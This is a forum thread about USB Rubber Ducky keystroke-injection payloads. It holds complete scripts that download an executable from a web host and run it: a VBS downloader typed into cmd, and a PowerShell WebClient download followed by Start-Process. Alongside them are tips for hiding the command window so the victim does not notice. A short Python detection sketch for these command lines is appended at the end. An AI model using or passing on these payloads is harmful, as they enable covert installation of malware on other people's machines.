[Question][Payload] Help with http download and execute.


crashie

Hi, I'm new to the ducky, just got it today :P

I am trying to get it to download an executable file from a http and then execute it. Have seen the payload called "Ducky Downloader" and it works, but not in the background, instead the CMD pops up and is visible during the whole time until it's finished doing what it should do, download and execute.

Isn't there a way to do this in the background so that it doesn't get noticed?

Thanks in advance!
/ Crashie

Btw, this is the script I'm talking about:

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs <INSERT URL HERE>
ENTER
STRING <INSERT EXE FILENAME HERE>
ENTER
STRING exit
ENTER

The problem is, the ducky relies on HID injection (keyboard injection), so it needs the focus of current windows to operate correctly (just like macros), as soon as your window-focus changes, the payload will cease to function correctly, as the payload will be split between 2+ windows.

The advantage is the Ducky types really fast, so just alt-f4 to close the window once the payload is complete, and hopefully no-one will be the wiser (or they're distracted or AFK) and completely miss the command prompt.

Alternatively - use the twin-duck firmware to execute directly from the sdcard! Saves from downloading (time/bandwidth), or even a valid http connection ;)


Hi and thanks for your response!

So, whatever I do with the rubber ducky it will always be shown on the actual computer? And there is no way to hide the windows?

I tried the RunEXE script (and have installed twin duck firmware (the special version 1 that runs the payload when CAPS is pressed)) but when I did that it just opened up hell of a lot of windows and the registry and some programs and did not execute my file.. So I don't know what went wrong there..

Appreciate any help given. And sorry for being such a newbie :P But one has to start somewhere ;)

/crashie


I posted a large payload somewhere with different possibilities on how to hide it.. where only one worked for me xD I don't remember it though.. but I guess I did it by entering the move command prompt option and then just very fast insert some down keys to hide it beneath your screen while it does the rest.


There are ways to hide the command prompt below the bottom or side of the screen. With the new duckscript compiler, the "REPEAT" command is now included, and here's a link to the hide CMD window payload:

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---hide-cmd-window

More recently I combined window hiding action with someone's PowerShell wget and execute:

REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DELAY 3000
GUI R
DELAY 1000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
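
From the detection side, both payloads in this thread end in a process launch whose command line gives them away however the window is handled: cscript run on a .vbs with a URL argument, and powershell chaining WebClient.DownloadFile into Start-Process. The sketch below is an added example, not part of any post in the thread; it matches those two patterns over constructed process-creation records, and the field names, rule names and sample values are assumptions.

```python
import re

# Constructed process-creation records; field names and values are
# illustrative assumptions, not taken from a real log source.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell (new-object System.Net.WebClient).DownloadFile("
                r"'http://example.com/bob.old','C:\Users\u\Temp\bob.exe'); "
                r"Start-Process 'C:\Users\u\Temp\bob.exe'"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": "cscript download.vbs http://example.com/tool.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell Get-ChildItem C:\Users"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript C:\Scripts\inventory.vbs /quiet"},
]

PS_DOWNLOAD = re.compile(r"net\.webclient.*downloadfile", re.I | re.S)
PS_EXEC = re.compile(r"start-process", re.I)
VBS_URL = re.compile(r"\.vbs\b.*\bhttps?://", re.I)

def classify(event):
    """Return the name of the matching rule, or None."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"]
    # Download and launch chained in a single PowerShell command line.
    if image == "powershell.exe" and PS_DOWNLOAD.search(cmd) and PS_EXEC.search(cmd):
        return "powershell-download-then-run"
    # Windows Script Host started on a .vbs file with a URL as argument.
    if image in ("cscript.exe", "wscript.exe") and VBS_URL.search(cmd):
        return "script-host-with-url-argument"
    return None

def scan(events):
    """Return (index, rule, launched_from_explorer) for each match."""
    hits = []
    for i, event in enumerate(events):
        rule = classify(event)
        if rule:
            # explorer.exe as parent means an interactive launch such as
            # the Run dialog, which is where typed keystrokes end up.
            from_explorer = event["parent"].lower().endswith("explorer.exe")
            hits.append((i, rule, from_explorer))
    return hits

if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
```

The two benign records (a plain PowerShell listing and a local inventory script) are there to show that the script host or PowerShell alone does not trigger a match.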